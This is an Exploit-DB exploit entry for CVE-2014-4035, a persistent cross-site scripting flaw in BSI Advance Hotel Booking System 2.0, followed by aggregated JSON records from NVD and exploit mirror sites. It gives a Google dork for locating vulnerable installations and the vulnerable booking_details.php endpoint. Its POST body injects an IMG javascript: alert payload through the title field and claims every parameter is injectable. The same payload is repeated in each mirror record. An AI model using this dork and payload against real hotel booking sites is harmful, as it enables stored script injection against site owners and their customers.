ID EDB-ID:47219
Type exploitdb
Reporter Exploit-DB
Modified 2019-08-12T00:00:00
Description
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
========================
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)
{"id": "EDB-ID:47219", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting", "description": "", "published": "2019-08-12T00:00:00", "modified": "2019-08-12T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://www.exploit-db.com/exploits/47219", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2014-4035"], "lastseen": "2019-08-12T15:45:19", "viewCount": 76, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-4035"]}, {"type": "zdt", "idList": ["1337DAY-ID-33100"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A21B2563159C7714FBFBCE266A021902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154024"]}], "modified": "2019-08-12T15:45:19", "rev": 2}, "score": {"value": 4.2, "vector": "NONE", "modified": "2019-08-12T15:45:19", "rev": 2}, "vulnersScore": 4.2}, "sourceHref": "https://www.exploit-db.com/download/47219", "sourceData": "# Exploit Title:BSI Advance Hotel Booking System Persistent XSS\r\n# Google Dork: intext:Hotel Booking System v2.0 \u00a9 2008 - 2012 Copyright Best Soft Inc\r\n# Date: Wed Jun 4 2014\r\n# Exploit Author: Angelo Ruwantha\r\n# Vendor Homepage: http://www.bestsoftinc.com\r\n# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html\r\n# Version: V2.0\r\n# Tested on: archlinux\r\n# CVE : CVE-2014-4035\r\n\r\nVulnerability\r\n========================\r\n\r\n[+]Method:POST\r\n\r\n1.http://URL/hotel-booking/booking_details.php (;persistent XSS)\r\n\r\nallowlang=&title=<IMG SRC=\"javascript:alert('HelloWorld ;)');\"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=\r\n\r\n\r\nevery parameter injectable :)", "osvdbidlist": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:14:30", "description": "Cross-site scripting (XSS) vulnerability in booking_details.php in Best Soft Inc. (BSI) Advance Hotel Booking System 2.0 allows remote attackers to inject arbitrary web script or HTML via the title parameter.", "edition": 5, "cvss3": {}, "published": "2014-06-11T14:55:00", "title": "CVE-2014-4035", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4035"], "modified": "2019-08-12T21:15:00", "cpe": ["cpe:/a:bestsoftinc:advance_hotel_booking_system:2.0"], "id": "CVE-2014-4035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4035", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:bestsoftinc:advance_hotel_booking_system:2.0:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nBSI Advance Hotel Booking System 2.0 - booking_details.php Persistent Cross-Site Scripting", "edition": 1, "published": "2019-08-12T00:00:00", "title": "BSI Advance Hotel Booking System 2.0 - booking_details.php Persistent Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4035"], "modified": "2019-08-12T00:00:00", "id": "EXPLOITPACK:A21B2563159C7714FBFBCE266A021902", "href": "", "sourceData": "# Exploit Title:BSI Advance Hotel Booking System Persistent XSS\n# Google Dork: intext:Hotel Booking System v2.0 \u00a9 2008 - 2012 Copyright Best Soft Inc\n# Date: Wed Jun 4 2014\n# Exploit Author: Angelo Ruwantha\n# Vendor Homepage: http://www.bestsoftinc.com\n# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html\n# Version: V2.0\n# Tested on: archlinux\n# CVE : CVE-2014-4035\n\nVulnerability\n========================\n\n[+]Method:POST\n\n1.http://URL/hotel-booking/booking_details.php (;persistent XSS)\n\nallowlang=&title=<IMG SRC=\"javascript:alert('HelloWorld ;)');\"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=\n\n\nevery parameter injectable :)", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2019-08-13T13:08:28", "description": "", "published": "2019-08-12T00:00:00", "type": "packetstorm", "title": "BSI Advance Hotel Booking System 2.0 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4035"], "modified": "2019-08-12T00:00:00", "id": "PACKETSTORM:154024", "href": "https://packetstormsecurity.com/files/154024/BSI-Advance-Hotel-Booking-System-2.0-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title:BSI Advance Hotel Booking System Persistent XSS \n# Google Dork: intext:Hotel Booking System v2.0 \u00a9 2008 - 2012 Copyright Best Soft Inc \n# Date: Wed Jun 4 2014 \n# Exploit Author: Angelo Ruwantha \n# Vendor Homepage: http://www.bestsoftinc.com \n# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html \n# Version: V2.0 \n# Tested on: archlinux \n# CVE : CVE-2014-4035 \n \nVulnerability \n======================== \n \n[+]Method:POST \n \n1.http://URL/hotel-booking/booking_details.php (;persistent XSS) \n \nallowlang=&title=<IMG SRC=\"javascript:alert('HelloWorld ;)');\"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos= \n \n \nevery parameter injectable :) \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/154024/bsiahbs20-xss.txt"}], "zdt": [{"lastseen": "2019-12-04T07:50:57", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-08-13T00:00:00", "title": "BSI Advance Hotel Booking System 2.0 - (booking_details.php) Persistent Cross-Site Scripting Vulnera", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4035"], "modified": "2019-08-13T00:00:00", "id": "1337DAY-ID-33100", "href": "https://0day.today/exploit/description/33100", "sourceData": "# Exploit Title:BSI Advance Hotel Booking System Persistent XSS\r\n# Google Dork: intext:Hotel Booking System v2.0 \u00a9 2008 - 2012 Copyright Best Soft Inc\r\n# Exploit Author: Angelo Ruwantha\r\n# Vendor Homepage: http://www.bestsoftinc.com\r\n# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html\r\n# Version: V2.0\r\n# Tested on: archlinux\r\n# CVE : CVE-2014-4035\r\n\r\nVulnerability\r\n========================\r\n\r\n[+]Method:POST\r\n\r\n1.http://URL/hotel-booking/booking_details.php (;persistent XSS)\r\n\r\nallowlang=&title=<IMG SRC=\"javascript:alert('HelloWorld ;)');\"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=\r\n\r\n\r\nevery parameter injectable :)\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33100"}]}